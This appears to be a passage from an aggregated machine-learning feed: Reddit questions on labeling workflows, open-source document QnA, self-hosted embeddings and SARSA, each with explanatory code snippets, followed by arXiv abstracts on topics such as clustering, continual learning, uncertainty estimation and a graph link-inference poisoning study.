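# No clipping is applied: a sizable fraction of pixels leaves [-1, 1],
# which is expected, since the theory needs truly Gaussian noise.
fraction_outside = (np.abs(xt) > 1.0).mean()
```

    Leaving the noised sample unclipped is exactly what keeps the Gaussian assumptions of the derivation intact, which is why implementations accept out-of-range values during training.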
    Team is burning out trying to create a dataset. Any solutions? [D]
    Good evening ML peeps. So I am currently creating a dataset in a team of three, aimed at training an object detection model with around 11 classes. We plan to label approximately 4,000 images. Our current workflow is a couple of scripts scraping from Pinterest plus Label Studio for labeling. We've labeled about 25% of our goal but realized that we are about to burn out. We'd prefer a solution that is self-hosted and not paid. Thoughts? Is there some kind of workflow we are missing for creating a dataset? submitted by /u/PlanetAcorn [link] [comments]  ( 9 min )
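    One common fix for labeling fatigue is model-assisted labeling: run a rough pretrained detector over the images first and import its boxes into Label Studio as pre-annotations, so the team corrects boxes instead of drawing them from scratch. A sketch of building an import task in what I believe is Label Studio's predictions format (the `from_name`/`to_name` values must match your labeling config, and the detector producing `boxes` is assumed, not shown):

```python
import json

def make_task(image_url, boxes, img_w, img_h):
    """One Label Studio import task with pre-annotations.

    boxes: (label, x, y, w, h) tuples in pixels from any rough detector;
    Label Studio stores rectangle coordinates as percentages of image size.
    """
    results = [
        {
            "from_name": "label",   # must match the names in your labeling config
            "to_name": "image",
            "type": "rectanglelabels",
            "value": {
                "x": 100.0 * x / img_w,
                "y": 100.0 * y / img_h,
                "width": 100.0 * w / img_w,
                "height": 100.0 * h / img_h,
                "rectanglelabels": [label],
            },
        }
        for (label, x, y, w, h) in boxes
    ]
    return {"data": {"image": image_url}, "predictions": [{"result": results}]}

task = make_task("https://example.com/img_001.jpg", [("cat", 50, 40, 200, 100)], 400, 400)
payload = json.dumps([task])  # the import endpoint takes a list of tasks
```

    Even a mediocre pretrained model (e.g. a COCO detector for the classes that overlap yours) tends to cut per-image labeling time substantially, since verifying is much faster than drawing.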
    [D] Document-based QnA without OpenAI?
    I am working on the kind of project that became very popular with the inception of LangChain + GPT applications. However, I want to make it open source and hence don't want to use GPT, so something like LangChain + Llama 2, etc. As far as I know, LangChain currently only supports GPT, but any other ideas are highly appreciated! submitted by /u/vishank97 [link] [comments]  ( 8 min )
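    Stripped of any framework, document QnA is mostly retrieval: chunk the documents, embed the chunks, find the chunks nearest the question, and hand them to whichever local LLM you choose. A minimal sketch with a toy bag-of-words embedder standing in for a real open-source embedding model (the chunks and question are made up for illustration):

```python
import math
import re
from collections import Counter

def embed(text):
    # Toy bag-of-words vector; in practice swap in an open-source embedding
    # model (e.g. a sentence-transformers encoder).
    return Counter(re.findall(r"[a-z0-9]+", text.lower()))

def cosine(a, b):
    dot = sum(a[t] * b[t] for t in a if t in b)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def retrieve(question, chunks, k=2):
    q = embed(question)
    return sorted(chunks, key=lambda c: cosine(q, embed(c)), reverse=True)[:k]

chunks = [
    "The warranty covers manufacturing defects for two years.",
    "Shipping takes five business days within the EU.",
    "Returns are accepted within thirty days of purchase.",
]
context = retrieve("How long is the warranty?", chunks, k=1)
# `context` is then pasted into the prompt of whatever local LLM you run,
# e.g. Llama 2 served via llama.cpp or vLLM.
```

    The point is that the retrieval half is model-agnostic: once it works, the GPT call at the end can be swapped for any locally hosted model without touching the rest of the pipeline.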
    [D] Looking for suggestions / guides on how to switch from OpenAI Embeddings and Pinecone to open-source / self-hosted architecture options.
    Hi all, I'm interested in redesigning my application to utilize an open-source embeddings model and a different vector DB. My current issue with embeddings is that processing large volumes of data into a vector DB using ada-002 is unreliable, with frequent API timeouts occurring or issues interacting with Pinecone. This is super problematic as it's difficult to track which data has / hasn't been stored correctly. I also know that many open-source embeddings models are more performant and will allow for more long-term control over my data. However, the advantage of using OpenAI / Pinecone has of course been simplicity in production and not having to worry about queries / retrieval working efficiently. To give context, I'm dealing with a large volume of documents, such that if I were to embed my documents into a FAISS index with a small sentence-transformers model, it would constitute 12GB, so a really simple solution like storing within the same application database is probably a no-go. In initiating this switch, I want to know the best approach towards: A) Utilizing an open-source embeddings model in a production context (is it best to host it as an API via a cloud provider, and what are some considerations I should think about? What's a fast / reliable way of setting this up? I would like to prioritise a simpler approach if possible.) B) What vector DB should I be looking into as an alternative, and what's the best way to self-host it so that it's comparably performant to hosted services like Pinecone (Docker? AWS?)? submitted by /u/theheffalump2000 [link] [comments]  ( 9 min )
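    On the reliability point specifically: the "which data has / hasn't been stored" problem is usually solved by keying every chunk on a content hash and recording successes in a local ledger, so a crashed or timed-out run can resume idempotently. A sketch, with `embed_and_upsert` as a stand-in for your embedding model plus vector DB client:

```python
import hashlib
import json
import os
import tempfile

def chunk_id(text):
    # Deterministic content hash: the same chunk always maps to the same ID,
    # so re-running the pipeline can never create duplicates.
    return hashlib.sha256(text.encode("utf-8")).hexdigest()[:16]

def embed_and_upsert(cid, text):
    # Stand-in for real work, e.g.: vec = model.encode(text); db.upsert(cid, vec)
    pass

def resumable_ingest(chunks, ledger_path):
    done = set()
    if os.path.exists(ledger_path):
        with open(ledger_path) as f:
            done = {json.loads(line)["id"] for line in f}
    with open(ledger_path, "a") as f:
        for text in chunks:
            cid = chunk_id(text)
            if cid in done:
                continue  # stored by an earlier (possibly crashed) run
            embed_and_upsert(cid, text)
            f.write(json.dumps({"id": cid}) + "\n")  # record success only after the upsert
            done.add(cid)
    return done

ledger = os.path.join(tempfile.mkdtemp(), "ingested.jsonl")
first = resumable_ingest(["chunk a", "chunk b", "chunk a"], ledger)
second = resumable_ingest(["chunk a", "chunk b", "chunk c"], ledger)  # resumes; only "chunk c" is new
```

    Writing the ledger line only after the upsert succeeds makes the worst-case failure a re-embed of one chunk, never a silent gap, and this works identically whether the backend is Pinecone or a self-hosted DB.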
    Why isn't there a SARSA equivalent that uses value functions?
    SARSA is a TD algorithm for control (learning optimal policies). In the book it's written like this: [image]. The idea is to learn the action-value function instead of the value function for a policy that we keep improving (using GPI). Once we learn the converged action-value function for all states, the optimal policy is greedily derived from the action-value function (basically, take the most promising action at each state). In contrast, TD for value estimation is written like this: [image]. Here we keep the policy fixed and just keep iterating over multiple episodes, whilst refining the value estimate. My question is: why can't we just change TD for value estimation to greedily update the policy at each stage? That would be in the spirit of generalized policy iteration (GPI) too. In other words, a version of SARSA which doesn't use action-value functions, but instead uses value functions? submitted by /u/AstronautVarious3791 [link] [comments]  ( 9 min )
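    The two updates side by side make the obstacle concrete: acting greedily with respect to V(s) requires a model of where each action leads, which is exactly what learning Q(s, a) lets you avoid. A minimal tabular sketch (toy sizes, my own illustration):

```python
import numpy as np

alpha, gamma = 0.1, 0.9
n_states, n_actions = 5, 2

def sarsa_update(Q, s, a, r, s2, a2):
    # SARSA: Q(s,a) += alpha * (r + gamma * Q(s',a') - Q(s,a))
    Q[s, a] += alpha * (r + gamma * Q[s2, a2] - Q[s, a])

def td0_update(V, s, r, s2):
    # TD(0) value estimation for a fixed policy:
    # V(s) += alpha * (r + gamma * V(s') - V(s))
    V[s] += alpha * (r + gamma * V[s2] - V[s])

def greedy_from_q(Q, s):
    # Greedy improvement from Q needs no model of the environment.
    return int(np.argmax(Q[s]))

def greedy_from_v(V, s, transition, reward):
    # Greedy improvement from V alone needs transition(s, a) and reward(s, a),
    # i.e. a model, to evaluate each candidate action.
    return int(np.argmax([reward(s, a) + gamma * V[transition(s, a)]
                          for a in range(n_actions)]))

Q = np.zeros((n_states, n_actions))
V = np.zeros(n_states)
sarsa_update(Q, 0, 0, 1.0, 1, 0)
td0_update(V, 0, 1.0, 1)
```

    A V-only SARSA is possible in principle, but `greedy_from_v` shows its cost: you must supply `transition` and `reward` functions, so the method stops being model-free, which is the usual answer to this question.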
    An Unsupervised Machine Learning Approach for Ground-Motion Spectra Clustering and Selection. (arXiv:2212.03188v2 [physics.geo-ph] UPDATED)
    Clustering analysis of sequence data continues to address many applications in engineering design, aided with the rapid growth of machine learning in applied science. This paper presents an unsupervised machine learning algorithm to extract defining characteristics of earthquake ground-motion spectra, also called latent features, to aid in ground-motion selection (GMS). In this context, a latent feature is a low-dimensional machine-discovered spectral characteristic learned through nonlinear relationships of a neural network autoencoder. Machine-discovered latent features can be combined with traditionally defined intensity measures and clustering can be performed to select a representative subgroup from a large ground-motion suite. The objective of efficient GMS is to choose characteristic records representative of what the structure will probabilistically experience in its lifetime. Three examples are presented to validate this approach, including the use of synthetic and field recorded ground-motion datasets. The presented deep embedding clustering of ground-motion spectra has three main advantages: 1. defining characteristics that represent the sparse spectral content of ground motions are discovered efficiently through training of the autoencoder, 2. domain knowledge is incorporated into the machine learning framework with conditional variables in the deep embedding scheme, and 3. the method exhibits excellent performance when compared to a benchmark seismic hazard analysis.  ( 2 min )
    End-to-End Reinforcement Learning of Koopman Models for Economic Nonlinear MPC. (arXiv:2308.01674v1 [cs.LG])
    (Economic) nonlinear model predictive control ((e)NMPC) requires dynamic system models that are sufficiently accurate in all relevant state-space regions. These models must also be computationally cheap enough to ensure real-time tractability. Data-driven surrogate models for mechanistic models can be used to reduce the computational burden of (e)NMPC; however, such models are typically trained by system identification for maximum average prediction accuracy on simulation samples and perform suboptimally as part of actual (e)NMPC. We present a method for end-to-end reinforcement learning of dynamic surrogate models for optimal performance in (e)NMPC applications, resulting in predictive controllers that strike a favorable balance between control performance and computational demand. We validate our method on two applications derived from an established nonlinear continuous stirred-tank reactor model. We compare the controller performance to that of MPCs utilizing models trained by the prevailing maximum prediction accuracy paradigm, and model-free neural network controllers trained using reinforcement learning. We show that our method matches the performance of the model-free neural network controllers while consistently outperforming models derived from system identification. Additionally, we show that the MPC policies can react to changes in the control setting without retraining.  ( 2 min )
    Relational Experience Replay: Continual Learning by Adaptively Tuning Task-wise Relationship. (arXiv:2112.15402v3 [cs.LG] UPDATED)
    Continual learning is a promising machine learning paradigm to learn new tasks while retaining previously learned knowledge over streaming training data. Till now, rehearsal-based methods, keeping a small part of data from old tasks as a memory buffer, have shown good performance in mitigating catastrophic forgetting for previously learned knowledge. However, most of these methods typically treat each new task equally, which may not adequately consider the relationship or similarity between old and new tasks. Furthermore, these methods commonly neglect sample importance in the continual training process and result in sub-optimal performance on certain tasks. To address this challenging problem, we propose Relational Experience Replay (RER), a bi-level learning framework, to adaptively tune task-wise relationships and sample importance within each task to achieve a better `stability' and `plasticity' trade-off. As such, the proposed method is capable of accumulating new knowledge while consolidating previously learned old knowledge during continual learning. Extensive experiments conducted on three publicly available datasets (i.e., CIFAR-10, CIFAR-100, and Tiny ImageNet) show that the proposed method can consistently improve the performance of all baselines and surpass current state-of-the-art methods.  ( 2 min )
    Unsupervised Multiplex Graph Learning with Complementary and Consistent Information. (arXiv:2308.01606v1 [cs.LG])
    Unsupervised multiplex graph learning (UMGL) has been shown to achieve significant effectiveness for different downstream tasks by exploring both complementary information and consistent information among multiple graphs. However, previous methods usually overlook the issues in practical applications, i.e., the out-of-sample issue and the noise issue. To address the above issues, in this paper, we propose an effective and efficient UMGL method to explore both complementary and consistent information. To do this, our method employs multiple MLP encoders rather than graph convolutional network (GCN) to conduct representation learning with two constraints, i.e., preserving the local graph structure among nodes to handle the out-of-sample issue, and maximizing the correlation of multiple node representations to handle the noise issue. Comprehensive experiments demonstrate that our proposed method achieves superior effectiveness and efficiency over the comparison methods and effectively tackles those two issues. Code is available at https://github.com/LarryUESTC/CoCoMG.  ( 2 min )
    OpenFlamingo: An Open-Source Framework for Training Large Autoregressive Vision-Language Models. (arXiv:2308.01390v1 [cs.CV])
    We introduce OpenFlamingo, a family of autoregressive vision-language models ranging from 3B to 9B parameters. OpenFlamingo is an ongoing effort to produce an open-source replication of DeepMind's Flamingo models. On seven vision-language datasets, OpenFlamingo models average between 80 - 89% of corresponding Flamingo performance. This technical report describes our models, training data, hyperparameters, and evaluation suite. We share our models and code at https://github.com/mlfoundations/open_flamingo.  ( 2 min )
    Collaborative causal inference on distributed data. (arXiv:2208.07898v2 [stat.ME] UPDATED)
    The development of technologies for causal inference with the privacy preservation of distributed data has attracted considerable attention in recent years. To address this issue, we propose a data collaboration quasi-experiment (DC-QE) that enables causal inference from distributed data with privacy preservation. In our method, first, local parties construct dimensionality-reduced intermediate representations from the private data. Second, they share intermediate representations, instead of private data, for privacy preservation. Third, propensity scores are estimated from the shared intermediate representations. Finally, treatment effects are estimated from the propensity scores. Our method can reduce both random errors and biases, whereas existing methods can only reduce random errors in the estimation of treatment effects. Through numerical experiments on both artificial and real-world data, we confirmed that our method can lead to better estimation results than individual analyses. Dimensionality reduction loses some of the information in the private data and causes performance degradation. However, we observed in the experiments that, by sharing intermediate representations with many parties to resolve the lack of subjects and covariates, our method improved performance enough to overcome the degradation caused by dimensionality reduction. With the spread of our method, intermediate representations can be published as open data to help researchers find causalities and accumulated as a knowledge base.  ( 2 min )
    Sharing to learn and learning to share -- Fitting together Meta-Learning, Multi-Task Learning, and Transfer Learning: A meta review. (arXiv:2111.12146v6 [cs.LG] UPDATED)
    Integrating knowledge across different domains is an essential feature of human learning. Learning paradigms such as transfer learning, meta learning, and multi-task learning reflect the human learning process by exploiting prior knowledge for new tasks, encouraging faster learning and good generalization for new tasks. This article gives a detailed view of these learning paradigms and their comparative analysis. The weakness of one learning algorithm turns out to be a strength of another, and thus merging them is a prevalent trait in the literature. There are numerous research papers that focus on each of these learning paradigms separately and provide a comprehensive overview of them. However, this article provides a review of research studies that combine (two of) these learning algorithms. This survey describes how these techniques are combined to solve problems in many different fields of study, including computer vision, natural language processing, hyperspectral imaging, and many more, in the supervised setting only. As a result, the global generic learning network, an amalgamation of meta learning, transfer learning, and multi-task learning, is introduced here, along with some open research questions and future research directions in the multi-task setting.  ( 3 min )
    Multimodality Helps Unimodality: Cross-Modal Few-Shot Learning with Multimodal Models. (arXiv:2301.06267v4 [cs.CV] UPDATED)
    The ability to quickly learn a new task with minimal instruction - known as few-shot learning - is a central aspect of intelligent agents. Classical few-shot benchmarks make use of few-shot samples from a single modality, but such samples may not be sufficient to characterize an entire concept class. In contrast, humans use cross-modal information to learn new concepts efficiently. In this work, we demonstrate that one can indeed build a better ${\bf visual}$ dog classifier by ${\bf read}$ing about dogs and ${\bf listen}$ing to them bark. To do so, we exploit the fact that recent multimodal foundation models such as CLIP are inherently cross-modal, mapping different modalities to the same representation space. Specifically, we propose a simple cross-modal adaptation approach that learns from few-shot examples spanning different modalities. By repurposing class names as additional one-shot training samples, we achieve SOTA results with an embarrassingly simple linear classifier for vision-language adaptation. Furthermore, we show that our approach can benefit existing methods such as prefix tuning, adapters, and classifier ensembling. Finally, to explore other modalities beyond vision and language, we construct the first (to our knowledge) audiovisual few-shot benchmark and use cross-modal training to improve the performance of both image and audio classification.  ( 3 min )
    An Effective LSTM-DDPM Scheme for Energy Theft Detection and Forecasting in Smart Grid. (arXiv:2307.16149v2 [cs.LG] UPDATED)
    Energy theft detection (ETD) and energy consumption forecasting (ECF) are two interconnected challenges in smart grid systems. Addressing these issues collectively is crucial for ensuring system security. This paper addresses the interconnected challenges of ETD and ECF in smart grid systems. The proposed solution combines long short-term memory (LSTM) and a denoising diffusion probabilistic model (DDPM) to generate input reconstruction and forecasting. By leveraging the reconstruction and forecasting errors, the system identifies instances of energy theft, with the methods based on reconstruction error and forecasting error complementing each other in detecting different types of attacks. Through extensive experiments on real-world and synthetic datasets, the proposed scheme outperforms baseline methods in ETD and ECF problems. The ensemble method significantly enhances ETD performance, accurately detecting energy theft attacks that baseline methods fail to detect. The research offers a comprehensive and effective solution for addressing ETD and ECF challenges, demonstrating promising results and improved security in smart grid systems.  ( 2 min )
    Bag of Policies for Distributional Deep Exploration. (arXiv:2308.01759v1 [cs.LG])
    Efficient exploration in complex environments remains a major challenge for reinforcement learning (RL). Compared to previous Thompson sampling-inspired mechanisms that enable temporally extended exploration, i.e., deep exploration, we focus on deep exploration in distributional RL. We develop here a general-purpose approach, Bag of Policies (BoP), that can be built on top of any return distribution estimator by maintaining a population of its copies. BoP consists of an ensemble of multiple heads that are updated independently. During training, each episode is controlled by only one of the heads and the collected state-action pairs are used to update all heads off-policy, leading to distinct learning signals for each head which diversify learning and behaviour. To test whether an optimistic ensemble method can improve distributional RL as it did scalar RL (e.g., via Bootstrapped DQN), we implement the BoP approach with a population of distributional actor-critics using Bayesian Distributional Policy Gradients (BDPG). The population thus approximates a posterior distribution of return distributions along with a posterior distribution of policies. Another benefit of building upon BDPG is that it allows analyzing global posterior uncertainty along with a local curiosity bonus simultaneously for exploration. As BDPG is already an optimistic method, this pairing helps to investigate whether optimism accumulates in distributional RL. Overall, BoP results in greater robustness and speed during learning, as demonstrated by our experimental results on ALE Atari games.  ( 2 min )
    Unsupervised Representation Learning for Time Series: A Review. (arXiv:2308.01578v1 [cs.LG])
    Unsupervised representation learning approaches aim to learn discriminative feature representations from unlabeled data, without the requirement of annotating every sample. Enabling unsupervised representation learning is extremely crucial for time series data, due to its unique annotation bottleneck caused by its complex characteristics and lack of visual cues compared with other data modalities. In recent years, unsupervised representation learning techniques have advanced rapidly in various domains. However, there is a lack of systematic analysis of unsupervised representation learning approaches for time series. To fill the gap, we conduct a comprehensive literature review of existing rapidly evolving unsupervised representation learning approaches for time series. Moreover, we also develop a unified and standardized library, named ULTS (i.e., Unsupervised Learning for Time Series), to facilitate fast implementations and unified evaluations on various models. With ULTS, we empirically evaluate state-of-the-art approaches, especially the rapidly evolving contrastive learning methods, on 9 diverse real-world datasets. We further discuss practical considerations as well as open research challenges on unsupervised representation learning for time series to facilitate future research in this field.
    CT Perfusion is All We Need: 4D CNN Segmentation of Penumbra and Core in Patient With Suspected Ischemic Stroke. (arXiv:2303.08757v2 [eess.IV] UPDATED)
    Precise and fast prediction methods for ischemic areas comprised of dead tissue, core, and salvageable tissue, penumbra, in acute ischemic stroke (AIS) patients are of significant clinical interest. They play an essential role in improving diagnosis and treatment planning. Computed Tomography (CT) scan is one of the primary modalities for early assessment in patients with suspected AIS. CT Perfusion (CTP) is often used as a primary assessment to determine stroke location, severity, and volume of ischemic lesions. Current automatic segmentation methods for CTP mostly use already processed 3D parametric maps conventionally used for clinical interpretation by radiologists as input. Alternatively, the raw CTP data is used on a slice-by-slice basis as 2D+time input, where the spatial information over the volume is ignored. In addition, these methods are only interested in segmenting core regions, while predicting penumbra can be essential for treatment planning. This paper investigates different methods to utilize the entire 4D CTP as input to fully exploit the spatio-temporal information, leading us to propose a novel 4D convolution layer. Our comprehensive experiments on a local dataset of 152 patients divided into three groups show that our proposed models generate more precise results than other methods explored. Adopting the proposed 4D mJ-Net, a Dice Coefficient of 0.53 and 0.23 is achieved for segmenting penumbra and core areas, respectively. The code is available on https://github.com/Biomedical-Data-Analysis-Laboratory/4D-mJ-Net.git.
    Optimal Training of Mean Variance Estimation Neural Networks. (arXiv:2302.08875v2 [stat.ML] UPDATED)
    This paper focusses on the optimal implementation of a Mean Variance Estimation network (MVE network) (Nix and Weigend, 1994). This type of network is often used as a building block for uncertainty estimation methods in a regression setting, for instance Concrete dropout (Gal et al., 2017) and Deep Ensembles (Lakshminarayanan et al., 2017). Specifically, an MVE network assumes that the data is produced from a normal distribution with a mean function and variance function. The MVE network outputs a mean and variance estimate and optimizes the network parameters by minimizing the negative loglikelihood. In our paper, we present two significant insights. Firstly, the convergence difficulties reported in recent work can be relatively easily prevented by following the simple yet often overlooked recommendation from the original authors that a warm-up period should be used. During this period, only the mean is optimized with a fixed variance. We demonstrate the effectiveness of this step through experimentation, highlighting that it should be standard practice. As a sidenote, we examine whether, after the warm-up, it is beneficial to fix the mean while optimizing the variance or to optimize both simultaneously. Here, we do not observe a substantial difference. Secondly, we introduce a novel improvement of the MVE network: separate regularization of the mean and the variance estimate. We demonstrate, both on toy examples and on a number of benchmark UCI regression data sets, that following the original recommendations and the novel separate regularization can lead to significant improvements.
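    The recommended warm-up is easy to express in code: minimize the Gaussian negative log-likelihood, but freeze the variance at first so only the mean fits. A toy sketch with a linear mean model and a scalar log-variance parameter (my own illustration via plain gradient descent, not the paper's networks):

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.uniform(-1.0, 1.0, size=500)
y = 2.0 * x + rng.normal(scale=0.5, size=500)   # true variance 0.25

# Model: mean mu = w*x + b, variance sigma^2 = exp(s) (exp keeps it positive).
w, b, s = 0.0, 0.0, 0.0
lr, warmup = 0.1, 200

def nll(w, b, s):
    # Gaussian negative log-likelihood (up to a constant)
    var = np.exp(s)
    return np.mean(0.5 * np.log(var) + 0.5 * (y - (w * x + b)) ** 2 / var)

for step in range(400):
    resid = y - (w * x + b)
    var = np.exp(s)
    w -= lr * np.mean(-resid * x / var)
    b -= lr * np.mean(-resid / var)
    if step >= warmup:
        # Only after the warm-up is the variance parameter allowed to move.
        s -= lr * np.mean(0.5 - 0.5 * resid ** 2 / var)
```

    Freezing the variance early prevents the failure mode where a still-wrong mean inflates the variance estimate, which in turn downweights the very residuals the mean needs to learn from.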
    Reverse Stable Diffusion: What prompt was used to generate this image?. (arXiv:2308.01472v1 [cs.CV])
    Text-to-image diffusion models such as Stable Diffusion have recently attracted the interest of many researchers, and inverting the diffusion process can play an important role in better understanding the generative process and how to engineer prompts in order to obtain the desired images. To this end, we introduce the new task of predicting the text prompt given an image generated by a generative diffusion model. We combine a series of white-box and black-box models (with and without access to the weights of the diffusion network) to deal with the proposed task. We propose a novel learning framework comprising a joint prompt regression and multi-label vocabulary classification objective that generates improved prompts. To further improve our method, we employ a curriculum learning procedure that promotes the learning of image-prompt pairs with lower labeling noise (i.e. that are better aligned), and an unsupervised domain-adaptive kernel learning method that uses the similarities between samples in the source and target domains as extra features. We conduct experiments on the DiffusionDB data set, predicting text prompts from images generated by Stable Diffusion. Our novel learning framework produces excellent results on the aforementioned task, yielding the highest gains when applied on the white-box model. In addition, we make an interesting discovery: training a diffusion model on the prompt generation task can make the model generate images that are much better aligned with the input prompts, when the model is directly reused for text-to-image generation.
    Relationship between Batch Size and Number of Steps Needed for Nonconvex Optimization of Stochastic Gradient Descent using Armijo Line Search. (arXiv:2307.13831v2 [cs.LG] UPDATED)
    Stochastic gradient descent (SGD) is the simplest deep learning optimizer with which to train deep neural networks. While SGD can use various learning rates, such as constant or diminishing rates, previous numerical results showed that SGD performs better than other deep learning optimizers when it uses learning rates given by line search methods. In this paper, we perform a convergence analysis on SGD with a learning rate given by an Armijo line search for nonconvex optimization. The analysis indicates that the upper bound of the expectation of the squared norm of the full gradient becomes small when the number of steps and the batch size are large. Next, we show that, for SGD with the Armijo-line-search learning rate, the number of steps needed for nonconvex optimization is a monotone decreasing convex function of the batch size; that is, the number of steps needed for nonconvex optimization decreases as the batch size increases. Furthermore, we show that the stochastic first-order oracle (SFO) complexity, which is the stochastic gradient computation cost, is a convex function of the batch size; that is, there exists a critical batch size that minimizes the SFO complexity. Finally, we provide numerical results that support our theoretical results. The numerical results indicate that the number of steps needed for training deep neural networks decreases as the batch size increases and that there exist critical batch sizes that can be estimated from the theoretical results.
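    The Armijo rule at the heart of this analysis is compact: shrink the step until the achieved decrease beats a fraction of what the gradient promises. A generic sketch for deterministic gradient descent (the paper's setting is stochastic, so treat this as the underlying rule only):

```python
import numpy as np

def armijo_step(f, grad, x, lr0=1.0, c=1e-4, shrink=0.5, max_backtracks=30):
    """Backtracking line search: find lr satisfying the Armijo condition
    f(x - lr*g) <= f(x) - c * lr * ||g||^2, halving lr until it holds."""
    g = grad(x)
    fx = f(x)
    lr = lr0
    for _ in range(max_backtracks):
        if f(x - lr * g) <= fx - c * lr * np.dot(g, g):
            return x - lr * g, lr
        lr *= shrink
    return x - lr * g, lr

# Quadratic example: f(x) = ||x||^2 / 2, minimized at the origin.
f = lambda x: 0.5 * np.dot(x, x)
grad = lambda x: x
x = np.array([3.0, -4.0])
for _ in range(50):
    x, lr = armijo_step(f, grad, x)
```

    In the stochastic setting the same test is applied to mini-batch estimates of f and its gradient, which is where the paper's batch-size dependence enters.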
    An efficient, provably exact, practical algorithm for the 0-1 loss linear classification problem. (arXiv:2306.12344v2 [cs.LG] UPDATED)
    Algorithms for solving the linear classification problem have a long history, dating back at least to 1936 with linear discriminant analysis. For linearly separable data, many algorithms can obtain the exact solution to the corresponding 0-1 loss classification problem efficiently, but for data which is not linearly separable, it has been shown that this problem, in full generality, is NP-hard. Alternative approaches all involve approximations of some kind, including the use of surrogates for the 0-1 loss (for example, the hinge or logistic loss) or approximate combinatorial search, none of which can be guaranteed to solve the problem exactly. Finding efficient algorithms to obtain an exact, i.e., globally optimal, solution for the 0-1 loss linear classification problem with fixed dimension remains an open problem. In the research we report here, we detail the rigorous construction of a new algorithm, incremental cell enumeration (ICE), that can solve the 0-1 loss classification problem exactly in polynomial time. We prove correctness using concepts from the theory of hyperplane arrangements and oriented matroids. We demonstrate the effectiveness of this algorithm on synthetic and real-world datasets, showing optimal accuracy both in and out of sample, in practical computational time. We also empirically demonstrate how the use of an approximate upper bound leads to polynomial-time run-time improvements to the algorithm whilst retaining exactness. To our knowledge, this is the first rigorously proven, polynomial-time, practical algorithm for this long-standing problem.
    Random Planted Forest: a directly interpretable tree ensemble. (arXiv:2012.14563v3 [stat.ML] UPDATED)
    We introduce a novel interpretable tree based algorithm for prediction in a regression setting. Our motivation is to estimate the unknown regression function from a functional decomposition perspective in which the functional components correspond to lower order interaction terms. The idea is to modify the random forest algorithm by keeping certain leaves after they are split instead of deleting them. This leads to non-binary trees which we refer to as planted trees. An extension to a forest leads to our random planted forest algorithm. Additionally, the maximum number of covariates which can interact within a leaf can be bounded. If we set this interaction bound to one, the resulting estimator is a sum of one-dimensional functions. In the other extreme case, if we do not set a limit, the resulting estimator and corresponding model place no restrictions on the form of the regression function. In a simulation study we find encouraging prediction and visualisation properties of our random planted forest method. We also develop theory for an idealized version of random planted forests in cases where the interaction bound is low. We show that if it is smaller than three, the idealized version achieves asymptotically optimal convergence rates up to a logarithmic factor. Code is available on GitHub https://github.com/PlantedML/randomPlantedForest.
    MIRACLE: Multi-task Learning based Interpretable Regulation of Autoimmune Diseases through Common Latent Epigenetics. (arXiv:2306.13866v2 [cs.LG] UPDATED)
    DNA methylation is a crucial regulator of gene transcription and has been linked to various diseases, including autoimmune diseases and cancers. However, diagnostics based on DNA methylation face challenges due to large feature sets and small sample sizes, resulting in overfitting and suboptimal performance. To address these issues, we propose MIRACLE, a novel interpretable neural network that leverages autoencoder-based multi-task learning to integrate multiple datasets and jointly identify common patterns in DNA methylation. MIRACLE's architecture reflects the relationships between methylation sites, genes, and pathways, ensuring biological interpretability and meaningfulness. The network comprises an encoder and a decoder, with a bottleneck layer representing pathway information as the basic unit of heredity. A custom MaskedLinear layer is constrained by the site-gene-pathway graph adjacency matrix, which provides explainability and expresses the site-gene-pathway hierarchical structure explicitly. From the embedding, separate multi-task classifiers predict diseases. Tested on six datasets, including rheumatoid arthritis, systemic lupus erythematosus, multiple sclerosis, inflammatory bowel disease, psoriasis, and type 1 diabetes, MIRACLE demonstrates robust performance in identifying common functions of DNA methylation across different phenotypes, with higher accuracy in predicting diseases than baseline methods. By incorporating biological prior knowledge, MIRACLE offers a meaningful and interpretable framework for DNA methylation data analysis in the context of autoimmune diseases.
    Nearest Neighbour with Bandit Feedback. (arXiv:2306.13773v2 [cs.LG] UPDATED)
    In this paper we adapt the nearest neighbour rule to the contextual bandit problem. Our algorithm handles the fully adversarial setting in which no assumptions at all are made about the data-generation process. When combined with a sufficiently fast data-structure for (perhaps approximate) adaptive nearest neighbour search, such as a navigating net, our algorithm is extremely efficient: it has a per-trial running time polylogarithmic in both the number of trials and actions, and takes only quasi-linear space.
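    To give a flavour of the nearest-neighbour idea in a bandit setting, here is a deliberately simplified greedy sketch. It is not the paper's algorithm (which handles adversarial data and uses navigating nets for fast search); it merely acts greedily on the reward recorded at the nearest previously seen context for each action, trying untried actions first.

```python
import numpy as np

def nn_greedy_action(contexts, actions, rewards, x, n_actions):
    """Simplified nearest-neighbour bandit rule (illustrative only).

    contexts: (t, d) past contexts; actions: (t,) actions played;
    rewards: (t,) observed rewards; x: (d,) current context.
    For each action, estimate its reward by the reward observed at the
    nearest past context where it was played; act greedily, exploring
    any action that has never been tried.
    """
    est = np.full(n_actions, -np.inf)
    for a in range(n_actions):
        idx = np.where(actions == a)[0]
        if idx.size == 0:
            return a  # explore an untried action first
        dists = np.linalg.norm(contexts[idx] - x, axis=1)
        est[a] = rewards[idx[np.argmin(dists)]]
    return int(np.argmax(est))
```

In the paper, the per-trial cost of the neighbour lookup is what the navigating-net data structure reduces to polylogarithmic time; the brute-force search above is linear in the history length.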
    VertexSerum: Poisoning Graph Neural Networks for Link Inference. (arXiv:2308.01469v1 [cs.LG])
    Graph neural networks (GNNs) have brought superb performance to various applications utilizing graph structural data, such as social analysis and fraud detection. The graph links, e.g., social relationships and transaction history, are sensitive and valuable information, which raises privacy concerns when using GNNs. To exploit these vulnerabilities, we propose VertexSerum, a novel graph poisoning attack that increases the effectiveness of graph link stealing by amplifying the link connectivity leakage. To infer node adjacency more accurately, we propose an attention mechanism that can be embedded into the link detection network. Our experiments demonstrate that VertexSerum significantly outperforms the SOTA link inference attack, improving the AUC scores by an average of $9.8\%$ across four real-world datasets and three different GNN structures. Furthermore, our experiments reveal the effectiveness of VertexSerum in both black-box and online learning settings, further validating its applicability in real-world scenarios.
    Evaluation of network-guided random forest for disease gene discovery. (arXiv:2308.01323v1 [q-bio.MN])
